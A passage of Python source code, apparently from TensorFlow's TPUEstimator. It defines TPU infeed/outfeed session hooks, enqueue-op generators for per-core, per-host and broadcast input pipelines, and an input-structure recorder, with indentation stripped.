mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = list(training_hooks or [])
evaluation_hooks = list(evaluation_hooks or [])
prediction_hooks = list(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
hooks = list(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
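# A minimal sketch of a `model_fn` returning `TPUEstimatorSpec`, assuming the
# usual `import tensorflow as tf` alias; `my_model`, `my_loss` and
# `my_optimizer` are hypothetical helpers. It only illustrates the
# `eval_metrics` and `host_call` tuples documented above.
#
#   def my_model_fn(features, labels, mode, params):
#     logits = my_model(features)
#     loss = my_loss(labels, logits)
#     train_op = my_optimizer(params).minimize(
#         loss, global_step=tf.train.get_global_step())
#
#     def metric_fn(labels, logits):
#       # Runs on CPU after `labels`/`logits` from all shards are concatenated.
#       predictions = tf.argmax(logits, axis=-1)
#       return {'accuracy': tf.metrics.accuracy(labels, predictions)}
#
#     def host_call_fn(global_step, loss):
#       # Runs on CPU; each tensor arrives batch-major (rank >= 1).
#       with tf.contrib.summary.create_file_writer('/tmp/summaries').as_default():
#         with tf.contrib.summary.always_record_summaries():
#           tf.contrib.summary.scalar('loss', loss[0], step=global_step[0])
#           return tf.contrib.summary.all_summary_ops()
#
#     global_step = tf.reshape(tf.train.get_global_step(), [1])
#     return TPUEstimatorSpec(
#         mode=mode,
#         loss=loss,
#         train_op=train_op,
#         eval_metrics=(metric_fn, [labels, logits]),
#         host_call=(host_call_fn, [global_step, tf.reshape(loss, [1])]))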
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initializes and shuts down the TPU system.
2. launches and joins the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True,
rendezvous=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._feed_error = None
self._finished = False
self._should_initialize_tpu = True
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._init_ops = []
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
logging.info('Starting outfeed thread controller.')
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Outfeed dequeue for iteration (%d, %d)', count, i)
session.run(self._dequeue_ops)
logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info('Init TPU system')
start = time.time()
session.run(self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000))
logging.info('Initialized TPU in %d seconds', time.time() - start)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(session,
shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info('Enqueue next (%d) batch(es) of data to infeed.', iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info('Dequeue next (%d) batch(es) of data from outfeed.',
iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
logging.info('Stop outfeed thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, rendezvous=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
the following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved, avoiding a race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError('One of num_steps or last_step must be specified.')
if num_steps is not None and last_step is not None:
raise ValueError('Only one of num_steps or last_step can be specified.')
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary, as we do not run infeed enqueue and outfeed dequeue
# in side threads for the prediction model. But it makes
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately.
raise errors.OutOfRangeError(None, None, 'Stopped by stopping signal.')
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope('ordinal_%d' % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
'`input_fn` returning `Dataset` is not yet supported in '
'per-Core input pipeline deployment. Please set '
'TPUConfig.per_host_input_for_training to True or return '
'`features` and `labels` from `input_fn`')
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels))
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing this as a Fn, it can be invoked inside the tf.while_loop such
that the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host)
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl)
captured_infeed_queue.capture(infeed_queue)
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcast to the other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
the call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dict, tuples, namedtuples or any nested
structure of such of Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library,
as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, feature_dims, feature_dims_names, label_dims,
label_dims_names, label_names, has_labels):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names])
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names])
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
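# Illustrative example (hypothetical values) of the flattening above: with
# features keyed 'x' and 'y' and a single unnamed label tensor,
#
#   feature_dims = {'x': [1, 2], 'y': [1, 1]}  # input_partition_dims[0]
#   label_dims = None                          # input_partition_dims[1]
#   recorder._flatten_input_dims(
#       feature_dims, feature_dims_names=['x', 'y'], label_dims=label_dims,
#       label_dims_names=[], label_names=[], has_labels=True)
#   # -> [[1, 2], [1, 1], None]
#
# which matches the order produced by flatten_features_and_labels below.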
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims, feature_dims_names, self._label_dims,
label_dims_names, label_names, has_labels)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have a structure identical (single tensor vs
dict) to the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
return _Inputs(
unflattened_inputs['features'],
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
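# Round-trip sketch (illustrative, with hypothetical `x_tensor`, `y_tensor` and
# `labels`): the recorder flattens a nested (features, labels) structure into a
# single tensor list for the infeed library and later packs the dequeued
# tensors back into the same structure.
#
#   recorder = _InputPipeline.InputsStructureRecorder()
#   features = {'x': x_tensor, 'y': y_tensor}
#   flat = recorder.flatten_features_and_labels(features, labels)
#   # ... the flat list travels through infeed/outfeed ...
#   inputs = recorder.unflatten_features_and_labels(flat)
#   features_out, labels_out = inputs.features_and_labels()  # same structure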
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, the body function, which invokes the
# `enqueue_fn` passed in, is called to construct the graph. So, the input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-Core input pipeline deployment.
# Invoke the input pipeline for each core, placed on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with ops.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should always be safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use a
# Python loop to enqueue the data into the TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
